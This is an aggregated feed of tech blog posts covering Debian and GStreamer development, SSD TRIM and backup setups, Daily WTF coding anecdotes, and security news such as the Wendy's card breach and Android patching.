Ulysses knows my pain. He recently inherited a Python codebase with plenty of global variables, no convention around capitalizing identifiers, inconsistent levels of indentation, and an AngularJS front end.

He found this when investigating a bug:

candidateNum=4
if candidateNum == "4":
    handleCandidate4()
    return true
else:
    handleCandidate3()
    return true

Once upon a time, this code received candidateNum as an input, and made a decision. Sometime in the past, Ulysses’s predecessor changed it according to a ticket: “Only use the candidate4 settings”. So, he hard-coded in candidateNum = 4 and released the change.

There was only one problem with that. Python’s == operator does strict comparisons. 4 != "4", and never will be. This leads us to think that perhaps the last person to touch this code knew JavaScript a little better than Python, since JavaScript has no type system to speak and happily coerces types silently.

Ulysses removed the conditional logic.

[Advertisement] Scale your release pipelines, creating secure, reliable, reusable deployments with one click. Download and learn more today!

Planet DebianMichal Čihař: Changed Debian repository signing key

After getting complains from apt and users, I've finally decided to upgrade signing key on my Debian repository to something more decent that DSA. If you are using that repository, you will now have to fetch new key to make it work again.

The old DSA key was there really because my laziness as I didn't want users to reimport the key, but I think it's really good that apt started to complain about it (it doesn't complain about DSA itself, but rather on using SHA1 signatures, which is most you can get out of DSA key).

Anyway the new key ID is DCE7B04E7C6E3CD9 and fingerprint is 4732 8C5E CD1A 3840 0419 1F24 DCE7 B04E 7C6E 3CD9. It's signed by my GPG key, so you can verify it this way. Of course instruction on my Debian repository page have been updated as well.

Filed under: Debian English | 2 comments

Planet DebianPetter Reinholdtsen: Debian now with ZFS on Linux included

Today, after many years of hard work from many people, ZFS for Linux finally entered Debian. The package status can be seen on the package tracker for zfs-linux. and the team status page. If you want to help out, please join us. The source code is available via git on Alioth. It would also be great if you could help out with the dkms package, as it is an important piece of the puzzle to get ZFS working.

Planet Linux AustraliaChris Smart: TRIM on LVM on LUKS on SSD, revisited

A few years ago I wrote about enabling trim on an SSD that was running with LVM on top of LUKS. Since then things have changed slightly, a few times.

With Fedora 24 you no longer need to edit the /etc/crypttab file and rebuild your initramfs. Now systemd supports a kernel boot argument rd.luks.options=discard which is the only thing you should need to do to enable trim on your LUKS device.

Edit /etc/default/grub and add the rd.luks.options=discard argument to the end of GRUB_CMDLINE_LINUX, e.g.:
GRUB_TIMEOUT=5
GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
GRUB_DEFAULT=saved
GRUB_DISABLE_SUBMENU=true
GRUB_TERMINAL_OUTPUT="console"
GRUB_CMDLINE_LINUX="rd.luks.uuid=luks-de023401-ccec-4455-832bf-e5ac477743dc rd.luks.uuid=luks-a6d344739a-ad221-4345-6608-e45f16a8645e rhgb quiet rd.luks.options=discard"
GRUB_DISABLE_RECOVERY="true"

Next, rebuild your grub config file:
sudo grub2-mkconfig -o /boot/grub2/grub.cfg

If you’re using LVM, the setting is the same as the previous post. Edit the /etc/lvm/lvm.conf file and enabled the issue_discards option:
issue_discards = 1

If using LVM you will need to rebuild your initramfs so that the updated lvm.conf is in there.
sudo dracut -f

Reboot and try fstrim:
sudo fstrim -v /

Now also thanks to systemd, you can just enable the fstrim timer (cron) to do this automatically:
sudo systemctl enable fstrim.timer

,

CryptogramFTC Investigating Android Patching Practices

It's a known truth that most Android vulnerabilities don't get patched. It's not Google's fault. They release the patches, but the phone carriers don't push them down to their smartphone users.

Now the Federal Communications Commission and the Federal Trade Commission are investigating, sending letters to major carriers and device makers.

I think this is a good thing. This is a long-existing market failure, and a place where we need government regulation to make us all more secure.

Cory DoctorowO’Reilly Hardware Podcast on the risks to the open Web and the future of the Internet of Things

I appeared on the O’Reilly Hardware Podcast this week (MP3, talking about the way that DRM has crept into all our smart devices, which compromises privacy, security and competition.

In this episode of the Hardware podcast, we talk with writer and digital rights activist Cory Doctorow. He’s recently rejoined the Electronic Frontier Foundation to fight a World Wide Web Consortium proposal that would add DRM to the core specification for HTML. When we recorded this episode with Cory, the W3C had just overruled the EFF’s objection. The result, he says, is that “we are locking innovation out of the Web.”

“It is illegal to report security vulnerabilities in a DRM,” Doctorow says. “[DRM] is making it illegal to tell people when the devices they depend upon for their very lives are unsuited for that purpose.”
Get O’Reilly’s weekly hardware newsletter

In our “Tools” segment, Doctorow tells us about tools that can be used for privacy and encryption, including the EFF surveillance self-defense kit, and Wickr, an encrypted messaging service that allows for an expiration date on shared messages and photos. “We need a tool that’s so easy your boss can use it,” he says.

Cory Doctorow on losing the open Web [O’Reilly Hardware Podcast]

LongNowNew Seminar Apps and Long Now Video Archive

The Long Now Foundation is making its video archive of the Seminars About Long-Term Thinking (SALT) freely available on its website and on the new Apple apps, allowing people to stream the SALT Seminars on Apple TV and their iOS devices.

The free iOS apps feature videos of The Long Now Foundation’s latest Seminars, including those by author and Nobel prize winner Daniel Kahneman; author Neil Gaiman; English composer and record producer Brian Eno; oceanographer Sylvia Earle; biotechnologist, biochemist and geneticist, Craig Venter; WIRED’s founding executive editor Kevin Kelly; author and MacArthur Fellow Elaine Pagels; Zappos CEO Tony Hsieh; biologist Edward O. Wilson; author and food activist Michael Pollan; and psychologist Dr. Walter Mischel, creator of The Marshmallow Test.

Long Now Seminars iOS app

The Long Now Foundation Seminars, which are hosted by Stewart Brand, are online and available in the iTunes store as as free app and audio podcast. The iOS app initially launched with 50 Seminars with new videos added monthly as part of the Foundation’s ongoing lecture series.

The Seminars are free to watch, and are made available through the generous donations of the members and sponsors of The Long Now Foundation. Membership begins at $96 per year, and includes free tickets to the monthly Seminars held at the SFJAZZ Center in San Francisco, as well as a quarterly newsletter, free and discounted tickets to partner events amongst other member offerings. The Seminar media is created in association with Shoulder High Productions, a full circle media company and with FORA.tv, a San Francisco-based video production and marketing company.

 

Sociological ImagesBlack Lawyers Are Likely to Face Harsher Scrutiny than Their White Counterparts

At Vox, Evan Soltas discusses new research from Nextoins showing racial bias in the legal profession. They put together a hypothetical lawyer’s research memo that had 22 errors of various kinds and distributed it to 60 partners in law firms who were asked to evaluate it as an example of the “writing competencies of young attorneys.” Some were told that the writer was black, others white.

Fifty-three sent back evaluations. They were on alert for mistakes, but those who believed the research memo was written by a white lawyer found fewer errors than those who thought they were reading a black lawyer’s writing. And they gave the white writer an overall higher grade on the report. (The partner’s race and gender didn’t effect the results, though women on average found more errors and gave more feedback.)

Illustration via Vox:

5

At Nextion, they collected typical comments:

8

This is just one more piece of evidence that the deck is stacked against black professionals. The old saying is that minorities and women have to work twice as hard for half the credit. This data suggests that there’s something to it.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on TwitterFacebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Main June 2016 Meeting: Talks TBA

Jun 7 2016 18:30
Jun 7 2016 20:30
Jun 7 2016 18:30
Jun 7 2016 20:30
Location: 

6th Floor, 200 Victoria St. Carlton VIC 3053

200 Victoria St. Carlton VIC 3053

Late arrivals, please call (0490) 049 589 for access to the venue.

Before and/or after each meeting those who are interested are welcome to join other members for dinner. We are open to suggestions for a good place to eat near our venue. Maria's on Peel Street in North Melbourne is currently the most popular place to eat after meetings.

LUV would like to acknowledge Red Hat and Infoxchange for their help in obtaining the meeting venues.

Linux Users of Victoria Inc. is an incorporated association, registration number A0040056C.

June 7, 2016 - 18:30

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners May Meeting: Apache Cassandra Workshop

May 21 2016 12:30
May 21 2016 16:30
May 21 2016 12:30
May 21 2016 16:30
Location: 

Infoxchange, 33 Elizabeth St. Richmond

This hands-on workshop will provide participants with an introduction to the Cassandra distributed "NoSQL" database management system, including deployment, keyspace and table manipulation, replication, creating multiple datacenters and creating users.

Participants will:

  • Install a Cassandra server
  • Create a keyspace
  • Create a table and insert data
  • Replicate data across a three-node cluster
  • Replicate data across a two-datacenter cluster
  • Set up Cassandra and JMX authentication

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.)

Late arrivals, please call (0490) 049 589 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

May 21, 2016 - 12:30

read more

Planet DebianElena 'valhalla' Grandi: GnuPG Crowdfunding and sticker

GnuPG Crowdfunding and sticker

I've just received my laptop sticker from the GnuPG crowdfund http://goteo.org/project/gnupg-new-website-and-infrastructure: it is of excellent quality, but comes with HOWTO-like detailed instructions to apply it in the proper way.

This strikes me as oddly appropriate.

#gnupg

Planet DebianElena 'valhalla' Grandi: New gpg subkey

New gpg subkey

The GPG subkey http://www.trueelena.org/about/gpg.html I keep for daily use was going to expire, and this time I decided to create a new one instead of changing the expiration date.

Doing so I've found out that gnupg does not support importing just a private subkey for a key it already has (on IRC I've heard that there may be more informations on it on the gpg-users mailing list), so I've written a few notes on what I had to do on my website http://www.trueelena.org/computers/howto/gpg_subkeys.html, so that I can remember them next year.

The short version is:

* Create your subkey (in the full keyring, the one with the private master key)
* export every subkey (including the expired ones, if you want to keep them available), but not the master key
* (copy the exported key from the offline computer to the online one)
* delete your private key from your regular use keyring
* import back the private keys you have exported before.

#gnupg

Krebs on SecurityWendy’s: Breach Affected 5% of Restaurants

Wendy’s said today that an investigation into a credit card breach at the nationwide fast-food chain uncovered malicious software on point-of-sale systems at fewer than 300 of the company’s 5,500 franchised stores. The company says the investigation into the breach is continuing, but that the malware has been removed from all affected locations.

wendysky“Based on the preliminary findings of the investigation and other information, the Company believes that malware, installed through the use of compromised third-party vendor credentials, affected one particular point of sale system at fewer than 300 of approximately 5,500 franchised North America Wendy’s restaurants, starting in the fall of 2015,” Wendy’s disclosed in their first quarter financial statement today. The statement continues:

“These findings also indicate that the Aloha point of sale system has not been impacted by this activity. The Aloha system is already installed at all Company-operated restaurants and in a majority of franchise-operated restaurants, with implementation throughout the North America system targeted by year-end 2016. The Company expects that it will receive a final report from its investigator in the near future.”

“The Company has worked aggressively with its investigator to identify the source of the malware and quantify the extent of the malicious cyber-attacks, and has disabled and eradicated the malware in affected restaurants. The Company continues to work through a defined process with the payment card brands, its investigator and federal law enforcement authorities to complete the investigation.”

“Based upon the investigation to date, approximately 50 franchise restaurants are suspected of experiencing, or have been found to have, unrelated cybersecurity issues. The Company and affected franchisees are working to verify and resolve these issues.”

The findings come as many banks and credit unions feeling card fraud pain because of the breach have been grumbling about the extent and duration of the breach. Sources at multiple financial institutions say their data indicates that some of the breached Wendy’s locations were still leaking customer card data as late as the end of March 2016 and into early April. The breach was first disclosed on this blog on January 27, 2016.

“Our ongoing investigation into unusual payment card activity at some Wendy’s restaurants is being led by a third party PFI and is proceeding as expeditiously as possible,” Wendy’s spokesman Bob Bertini said in response to questions about the duration of the breach at some stores. “As you are aware, our investigator is required to follow certain protocols in this type of comprehensive investigation and this takes time. Adding to the complexity is the fact that most Wendy’s restaurants are owned and operated by independent franchisees.”

CryptogramNew Credit Card Scam

A criminal ring was arrested in Malaysia for credit card fraud:

They would visit the online shopping websites and purchase all their items using phony credit card details while the debugging app was activated.

The app would fetch the transaction data from the bank to the online shopping website, and trick the website into believing that the transaction was approved, when in reality, it had been declined by the bank.

The syndicates would later sell the items they had purchased illegally for a much lower price.

The problem here seems to be bad systems design. Why should the user be able to spoof the merchant's verification protocol with the bank?

Worse Than FailureThe EDI Fall Back

Chris M. was a developer at Small Widget Manufacturing. He and his coworker Scott were, in theory, assigned only to developing their in-house ERP software. However, with just one person running the company’s help desk, they often picked up anything considered “software-related.”

A ticket pinged Chris’s inbox: EDI Running Slow. It was from a sales rep named Brett, and like most tickets from sales reps, was marged Urgent. Chris decided to play ball, since Scott was tied up with something else. He called Brett, asking if he could elaborate.

Calendar by Johannes von Gmunden, 15th century

“Normally, when I get an order from a customer,” Brett said, “I can just go into our ERP system and upload it, and it’ll get imported in fifteen minutes. If I get an error, I wait fifteen minutes and try again. That used to work, but now it’s taking longer than 45 minutes for it to upload.”

“It’s probably just a scheduler that’s misconfigured,” Chris said. “I’ll look into it.”

Reappropriated Hardware

Small Widget Manufacturing used a custom-built EDI solution for transferring orders, blueprints, etc. between their customers and the plant. The whole thing had been delivered by some expensive third-party consultants just before Chris had started at Small Widget, after which the consultants vanished without a trace. They hadn’t even left behind documentation for the EDI software.

Chris hadn’t yet dug into the guts of the EDI software, so he asked Scott where it was housed. “Dunno,” he replied. “Check with IT.”

Fine. So Chris went to IT, talking to Cori, who headed that department. After half an hour of digging through paperwork, she led Chris to a desktop box in a corner, covered in dust. On its case was a badge: Windows 7 Home, it said.

“EDI runs on that?”

Cori nodded. “The consultants didn’t want to put it on some new hardware, so they dug this out of storage and installed their software on it. They didn’t even bother to reformat it.”

A Time-Saving Feature

Back at his desk, Chris was able to remote desktop onto the Win7 machine and began digging around. He checked the hard drive first, noticing that there was very little space left. The default Windows task scheduler was terrible, so anything usable must be custom-built. He noticed an application running in the taskbar with a clock icon. He clicked on it, spawning a console window.

The highly-paid consultant’s EDI solution was little more than a long-running FTP app. Thinking that the app must be choking the disk with logs, Chris dug through the hard drive and found them.

[12] Sun 01Nov15 03:24:04 - (Task: SPS FTP) - Next scheduled execution on Sunday, November 01, 2015 04:39:00

That looked wrong. Brett said that his file transfers happened within 15 minutes. Why would the next task be scheduled for an hour and fifteen minutes in the future? Digging further back into the logs, he found this:

[12] Sat 31Oct15 23:39:02 - (Task: SPS FTP) - Next scheduled execution on Saturday, October 31, 2015 23:54:00

It was scheduling tasks correctly on October 31st, but not November 1st. So what happened on that date to cause the scheduler to bump up the interval by an hour? Frustrated, Chris stepped over to Scott’s desk to bounce some ideas off of him. He asked what could possibly have happened on November 1st.

“I dunno,” Scott said. “Daylight saving time?”

As Scott said it, both he and Chris knew that was exactly what was wrong with the machine. It was running off its own scheduler, not Windows, so whatever solution the highly-paid consultants had given Small Widget, it didn’t account for the end of daylight saving time.

Future-Proofing

After some further digging, Chris discovered a setting: the app used “09–01–2015” as a start date for its scheduling timer. He changed this to “11–02–2015”, a day after the end of daylight saving time. He restarted the app in task manager, waited half an hour, and checked the logs.

It was once again running every 15 minutes.

He called Brett with the news, who was just happy that his file transfers didn’t take over an hour to complete. Chris also added an item to his calendar: at the beginning of daylight saving time next year, he would change the date setting again. He didn’t want to know what would happen if the scheduled task were set to run every –45 minutes.

[Advertisement] Infrastructure as Code built from the start with first-class Windows functionality and an intuitive, visual user interface. Download Otter today!

Planet DebianSylvain Le Gall: Release of OASIS 0.4.6

I am happy to announce the release of OASIS v0.4.6.

Logo OASIS small

OASIS is a tool to help OCaml developers to integrate configure, build and install systems in their projects. It should help to create standard entry points in the source code build system, allowing external tools to analyse projects easily.

This tool is freely inspired by Cabal which is the same kind of tool for Haskell.

You can find the new release here and the changelog here. More information about OASIS in general on the OASIS website.

The main purpose of this release is to make possible to install OASIS with OPAM with OCaml 4.03.0. In order to do so, I had to disable some tests and use a new set of String.*_ascii functions. The OPAM release is pending upload and should soon be available.

Planet DebianJulian Andres Klode: Backing up with borg and git-annex

I recently found out that I have access to a 1 TB cloud storage drive by 1&1, so I decided to start taking off-site backups of my $HOME (well, backups at all, previously I only mirrored the latest version from my SSD to an HDD).

I initially tried obnam. Obnam seems like a good tool, but is insanely slow. Unencrypted it can write about 3 MB/s, which is somewhat OK, but even then it can spend hours forgetting generations (1 generation takes probably 2 minutes, and there might be 22 of them). In encrypted mode, the speed reduces a lot, to about 500 KB/s if I recall correctly, which is just unusable.

I found borg backup, a fork of attic. Borg backup achieves speeds of up to 15 MB/s which is really nice. It’s also faster with scanning: I can now run my bihourly backups in about 1 min 30s (usually backs up about 30 to 80 MB – mostly thanks to Chrome I suppose!). And all those speeds are with encryption turned on.

Both borg and obnam use some form of chunks from which they compose files. Obnam stores each chunk in its own file, borg stores multiple chunks (even from different files) in a single pack file which is probably the main reason it is faster.

So how am I backing up: My laptop has an internal SSD and an HDD.  I backup every 2 hours (at 09,11,13,15,17,19,21,23,01:00 hours) using a systemd timer event, from the SSD to the HDD. The backup includes all of $HOME except for Downloads, .cache, the trash, Android SDK, and the eclipse and IntelliJ IDEA IDEs.

Now the magic comes in: The backup repository on the HDD is monitored by git-annex assistant, which automatically encrypts and uploads any new files in there to my 1&1 WebDAV drive and registers them in a git repository hosted on bitbucket. All files are encrypted and checksummed using SHA256, reducing the chance of the backup being corrupted.

I’m not sure how the WebDAV thing will work once I want to prune things, I suspect it will then delete some pack files and repack things into new files which means it will spend more bandwidth than obnam would. I’d also have to convince git-annex to actually drop anything from the WebDAV remote, but that is not really that much of a concern with 1TB storage space in the next 2 years at least…

I also have an external encrypted HDD which I can take backups on, it currently houses a fuller backup of $HOME that also includes Downloads, the Android SDK, and the IDEs for quicker recovery. Downloads changes a lot, and all of them can be fairly easily re-retrieved from the internet as needed, so there’s not much point in painfully uploading them to a WebDAV backup site.

 


Filed under: Uncategorized

Planet DebianNorbert Preining: Gaming: The Room series

After having finished Monument Valley and some spin-offs, Google Play suggested me The Room series games (The Room, The Room II, Room III), classical puzzle games with a common theme – one needs to escape from some confinement.

room3

I have finished all the three games, game play was very nice and smooth on my phone (Nexus 6P). The graphics and detail level is often astonishing, and everything is well made.

But there is one drop of Vermouth: You need a strong finger tapping muscle! I really love solving the puzzles, but most of them were not really difficult. The real difficulty is finding everything by touching each and every knob, looking from all angles at all times. This later part, the tedious part to find things by often illogically tapping on strange places to realize “ahh, there is something that turns”, that is what I do not like.

I had the feeling that more than 60% of the game play is searching for things. Once you have found them, their use and the actual riddle is mostly straightforward, though.

The Room series somehow reminded me of the Myst series (Myst, Riven, Myst III etc), but afair the Myst series had more involved, more complicated riddles, and less searching. Also the recently reviewed Talos Principle and Portal series have clear set problems that challenge your brain, not your finger tapping muscle.

But all in all a very enjoyable series of games.

Final remark: I learned recently that there are real-world games like this, called “Escape Room“. Somehow tempting to try one out …

Planet Linux AustraliaJan Schmidt: Towards GStreamer 1.0 talk

 GStreamer logo

I gave my talk titled “Towards GStreamer 1.0” at the Gran Canaria Desktop Summit on Sunday. The slides are available here

My intention with the talk was to present some of the history and development of the GStreamer project as a means to look at where we might go next. I talked briefly about the origins of the project, its growth, and some of my personal highlights from the work we’ve done in the last year. To prepare the talk, I extracted some simple statistics from our commit history. In those, it’s easy to see both the general growth of the project, in terms of development energy/speed, as well as the increase in the number of contributors. It’s also possible to see the large hike in productivity that switching to Git in January has provided us.

The second part of the talk was discussing some of the pros and cons around considering whether to embark on a new major GStreamer release cycle leading up to a 1.0 release. We’ve successfully maintained the 0.10 GStreamer release series with backwards-compatible ABI and API (with some minor glitches) for 3.5 years now, and been very successful at adding features and improving the framework while doing so.

After 3.5 years of stable development, it’s clear to me that when we made GStreamer 0.10, it really ought to have been 1.0. Nevertheless, there are some parts of GStreamer 0.10 that we’re collectively not entirely happy with and would like to fix, but can’t without breaking backwards compatibility – so I think that even if we had made 0.10 at that point, I’d want to be doing 1.2 by now.

Some examples of things that are hard to do in 0.10:

  • Replace ugly or hard to use API
  • ABI mistakes such as structure members that should be private having been accidentally exposed in some release.
  • Running out of padding members in public structures, preventing further expansion
  • Deprecated API (and associated dead code paths) we’d like to remove

There are also some enhancements that fall into a more marginal category, in that they are technically possible to achieve in incremental steps during the 0.10 cycle, but are made more difficult by the need to preserve backwards compatibility. These include things like adding per-buffer metadata to buffers (for extensible timestamping/timecode information, pan & scan regions and others), variable strides in video buffers and creating/using more base classes for common element types.

In the cons category are considerations like the obvious migration pain that breaking ABI will cause our applications, and the opportunity cost of starting a new development cycle. The migration cost is mitigated somewhat by the ability to have parallel installations of GStreamer. GStreamer 0.10 applications will be able to coexist with GStreamer 1.0 applications.

The opportunity cost is a bit harder to ignore. When making the 0.9 development series, we found that the existing 0.8 branch became essentially unmaintained for 1.5 years, which is a phenomenon we’d all like to avoid with a new release series. I think that’s possible to achieve this time around, because I expect a much smaller scope of change between 0.10 and 1.0. Apart from the few exceptions above, GStreamer 0.10 has turned out really well, and has become a great framework being used in all sorts of exciting ways that doesn’t need large changes.

Weighing up the pros and cons, it’s my opinion that it’s worth making GStreamer 1.0. With that in mind, I made the following proposal at the end of my talk:

  • We should create a shared Git playground and invite people to use it for experimental API/ABI branches
  • Merge from the 0.10 master regularly into the playground regularly, and rebase/fix experimental branches
  • Keep developing most things in 0.10, relying on the regular merges to get them into the playground
  • After accumulating enough interesting features, pull the experimental branches together as a 0.11 branch and make some released
  • Target GStreamer 1.0 to come out in time for GNOME 3.0 in March 2010

This approach wasn’t really possible the last time around when everything was stored in CVS – it’s having a fast revision control system with easy merging and branch management that will allow it.

GStreamer Summit

On Thursday, we’re having a GStreamer summit in one of the rooms at the university. We’ll be discussing my proposal above, as well as talking about some of the problems people have with 0.10, and what they’d like to see in 1.0. If we can, I’d like to draw up a list of features and changes that define GStreamer 1.0 that we can start working towards.

Please come along if you’d like to help us push GStreamer forward to the next level. You’ll need to turn up at the university GCDS venue and then figure out on your own which room we’re in. We’ve been told there is one organised, but not where – so we’ll all be in the same boat.

The summit starts at 11am.

Planet Linux AustraliaJan Schmidt: New York trip, DVD stuff

We’re leaving tomorrow afternoon for 11 days holiday in New York and Washington D.C. While we’re there, I’m hoping to catch up with Luis and Krissa and Thom May. It’s our first trip to either city, so we’re really excited – there’s a lot of fun, unique stuff to do in both places and we’re looking forward to trying to do all of it in our short visit.

On the GStreamer front, I just pushed a bunch of commits I’ve been working on for the past few weeks upstream into Totem, gst-plugins-base and gst-plugins-bad. Between them they fix a few DVD issues like multiangle support and playback in playbin2. The biggest visible feature though is the API that allowed me to (finally!) hook up the DVD menu items in Totem’s UI. Now the various ‘DVD menu’, ‘Title Menu’ etc menu items work, as well as switching angles in multiangle titles, and it provides the nice little ‘cursor switches to a hand when over a clickable button’ behaviour.

I actually had it all ready yesterday, but people told me April 1 was the wrong day to announce any big improvements in totem-gstreamer DVD support :-)

Planet Linux AustraliaJan Schmidt: A glimpse of audio nirvana

This is post is basically a love letter to the Pulseaudio and Gnome Bluetooth developers.

I upgraded my laptop to Ubuntu Karmic recently, which brought with it the ability to use my Bluetooth A2DP headphones natively. Getting them running is now as simple as using the Bluetooth icon in the panel to pair the laptop with the headphones, and then selecting them in the Sound Preferences applet, on the Output tab.

As soon as the headphones are connected, they show up as a new audio device. Selecting it instantly (and seamlessly) migrates my sounds and music from the laptop sound device onto the headphones. The Play/Pause, Next Track and Previous Track buttons all generate media key keypresses – so Rhythmbox and Totem behave like they’re supposed to. It’s lovely.

If that we’re all, it would already be pretty sweet in my opinion, but wait – there’s more!

A few days after starting to use my bluetooth headphones, my wife and I took a trip to Barcelona (from Dublin, where we live for the next few weeks… more on that later). When we got to the airport, the first thing we learned was that our flight had been delayed by 3 hours. Since I occasionally hack on multimedia related things, I typically have a few DVDs
with me for testing. In this case, I had Vicky Christina Barcelona on hand, and we hadn’t watched it yet – a perfect choice for 2 people on their way to Barcelona.

Problem! There are four sets of ears wanting to listen to the DVD, and only 2 audio channels produced. I could choose to send the sound to either the in built sound device, and listen on the earbuds my wife had, or I could send it to my bluetooth headphones, but not both.

Pulseaudio to the rescue! With a bit of command-line fu (no GUI for this, but that’s totally do-able), I created a virtual audio device, using Pulseaudio’s “combine” module. Like the name suggests, it combines multiple other audio devices into a single one. It can do more complex combinations (such as sending some channels hither and others thither), but I just needed a straight mirroring of the devices. In a terminal, I ran:

pactl load-module module-combine sink_name=shared_play adjust_time=3 slaves=”alsa_output.pci-0000_00_1b.0.analog-stereo,bluez_sink.00_15_0F_72_70_E1″

Hey presto! Now there’s a third audio device available in the Sound Preferences to send the sound to, and it comes out both the wired ear buds and my bluetooth headphones (with a very slight sync offset, but close enough for my purposes).

Also, for those interested – the names of the 2 audio devices in my pactl command line came from the output of ‘pactl list’.

This kind of seamless migration of running audio streams really isn’t possible to do without something like Pulseaudio that can manage stream routing on the fly. I’m well aware that Pulseaudio integration into the distributions has been a bumpy ride for lots of people, but I think the end goal justifies the painful process of fixing all the sound drivers. I hope you do too!

edit
Lennart points out that the extra paprefs application has a “Add virtual output device for simultaneous output on all local sound cards” check-box that does the same thing as loading the combine module manual, but also handles hot-plugging of devices as they appear and disappear.

Planet Linux AustraliaJan Schmidt: OSSbarcamp 2 – GNOME 3.0 talk

I gave a talk at the second Dublin OSSbarcamp yesterday. My goal was to provide some insight into the goals for GNOME 3.0 for people who didn’t attend GCDS.

Actually, the credit for the entire talk goes to Vincent and friends, who gave the GNOME 3.0 overview during the GUADEC opening at GCDS and to Owen for his GNOME Shell talk. I stole content from their slides shamelessly.

The slides are available in ODP form, or as a PDF

Planet Linux AustraliaJan Schmidt: New gst-rpicamsrc features

I’ve pushed some new changes to my Raspberry Pi camera GStreamer wrapper, at https://github.com/thaytan/gst-rpicamsrc/

These bring the GStreamer element up to date with new features added to raspivid since I first started the project, such as adding text annotations to the video, support for the 2nd camera on the compute module, intra-refresh and others.

Where possible, you can now dynamically update any of the properties – where the firmware supports it. So you can implement digital zoom by adjusting the region-of-interest (roi) properties on the fly, or update the annotation or change video effects and colour balance, for example.

The timestamps produced are now based on the internal STC of the Raspberry Pi, so the audio video sync is tighter. Although it was never terrible, it’s now more correct and slightly less jittery.

The one major feature I haven’t enabled as yet is stereoscopic handling. Stereoscopic capture requires 2 cameras attached to a Raspberry Pi Compute Module, so at the moment I have no way to test it works.

I’m also working on GStreamer stereoscopic handling in general (which is coming along). I look forward to releasing some of that code soon.

 

Planet Linux AustraliaJan Schmidt: Network clock examples

Way back in 2006, Andy Wingo wrote some small scripts for GStreamer 0.10 to demonstrate what was (back then) a fairly new feature in GStreamer – the ability to share a clock across the network and use it to synchronise playback of content across different machines.

Since GStreamer 1.x has been out for over 2 years, and we get a lot of questions about how to use the network clock functionality, it’s a good time for an update. I’ve ported the simple examples for API changes and to use the gobject-introspection based Python bindings and put them up on my server.

To give it a try, fetch play-master.py and play-slave.py onto 2 or more computers with GStreamer 1 installed. You need a media file accessible via some URI to all machines, so they have something to play.

Then, on one machine run play-master.py, passing a URI for it to play and a port to publish the clock on:

./play-master.py http://server/path/to/file 8554

The script will print out a command line like so:

Start slave as: python ./play-slave.py http://server/path/to/file [IP] 8554 1071152650838999

On another machine(s), run the printed command, substituting the IP address of the machine running the master script.

After a moment or two, the slaved machine should start playing the file in synch with the master:

Network Synchronised Playback

If they’re not in sync, check that you have the port you chose open for UDP traffic so the clock synchronisation packets can be transferred.

This basic technique is the core of my Aurena home media player system, which builds on top of the network clock mechanism to provide file serving and a simple shuffle playlist.

For anyone still interested in GStreamer 0.10 – Andy’s old scripts can be found on his server: play-master.py and play-slave.py

Planet Linux AustraliaJan Schmidt: 2014 GStreamer Conference

I’ve been home from Europe over a week, after heading to Germany for the annual GStreamer conference and Linuxcon Europe.

We had a really great turnout for the GStreamer conference this year

GstConf2k14

as well as an amazing schedule of talks. All the talks were recorded by Ubicast, who got all the videos edited and uploaded in record time. The whole conference is available for viewing at http://gstconf.ubicast.tv/channels/#gstreamer-conference-2014

I gave one of the last talks of the schedule – about my current work adding support for describing and handling stereoscopic (3D) video. That support should land upstream sometime in the next month or two, so more on that in a bit.

elephant

There were too many great talks to mention them individually, but I was excited by 3 strong themes across the talks:

  • WebRTC/HTML5/Web Streaming support
  • Improving performance and reducing resource usage
  • Building better development and debugging tools

I’m looking forward to us collectively making progress on all those things and more in the upcoming year.

Planet Linux AustraliaJan Schmidt: Mysterious Parcel

I received a package in the mail today!
Mysterious Package

Everything arrived all nicely packaged up in a hobby box and ready for assembly.
Opening the box

Lots of really interesting goodies in the box!
Out on the table

After a little while, I’ve got the first part together.First part assembled

The rest will have to wait for another day. In the meantime, have fun guessing what it is, and enjoy this picture of a cake I baked on the weekend:
Strawberry Sponge Cake

See you later!

Planet Linux AustraliaJan Schmidt: DVD playback in GStreamer 1.0

Some time in 2012, the GStreamer team was busy working toward the GStreamer 1.0 major release. Along the way, I did my part and ported the DVD playback components from 0.10. DVD is a pretty complex playback scenario (let’s not talk about Blu-ray)

I gave a talk about it at the GStreamer conference way back in 2010 – video here. Apart from the content of that talk, the thing I liked most was that I used Totem as my presentation tool :)

With all the nice changes that GStreamer 1.0 brought, DVD playback worked better than ever. I was able to delete a bunch of hacks and workarounds from the 0.10 days. There have been some bugs, but mostly minor things. Recently though, I became aware of a whole class of DVDs that didn’t work for a very silly reason. The symptom was that particular discs would error out at the start with a cryptic “The stream is in the wrong format” message.

It turns out that these are DVDs that begin with a piece of video that has no sound.

Sometimes, that’s implemented on a disc as a video track with accompanying silence, but in the case that was broken the DVDs have no audio track for that initial section at all. For a normal file, GStreamer would handle that by not creating any audio decoder chain or audio sink output element and just decode and play video. For DVD though, there are very few discs that are entirely without audio – so we’re going to need the audio decoder chain sooner or later. There’s no point creating and destroying when the audio track appears and disappears.

Accordingly, we create an audio output pad, and GStreamer plugs in a suitable audio output sink, and then nothing happens because the pipeline can’t get to the Playing state – the pipeline is stuck in the Paused state. Before a pipeline can start playing, it has to progress through Ready and Paused and then to Playing state. The key to getting from Paused to Playing is that each output element (video sink and audio sink) in our case, has to receive some data and be ready to output it. A process called Pre-roll. Pre-rolling the pipeline avoids stuttering at the start, because otherwise the decoders would have to race to try and deliver something in time for it to get on screen.

With no audio track, there’s no actual audio packets to deliver, and the audio sink can’t Pre-roll. The solution in GStreamer 1.0 is a GAP event, sent to indicate that there is a space in the data, and elements should do whatever they need to to skip or fill it. In the audio sink’s case it should handle it by considering itself Pre-rolled and allowing the pipeline to go to Playing, starting the ring buffer and the audio clock – from which the rest of the pipeline will be timed.

Everything up to that point was working OK – the sink received the GAP event… and then errored out. It expects to be told what format the audio samples it’s receiving are so it knows how to fill in the gap… when there’s no audio track and no audio data, it was never being told.

In the end, the fix was to make the dummy place-holder audio decoder choose an audio sample format if it gets a GAP event and hasn’t received any data yet – any format, it doesn’t really matter as long as it’s reasonable. It’ll be discarded and a new format selected and propagated when some audio data really is encountered later in playback.

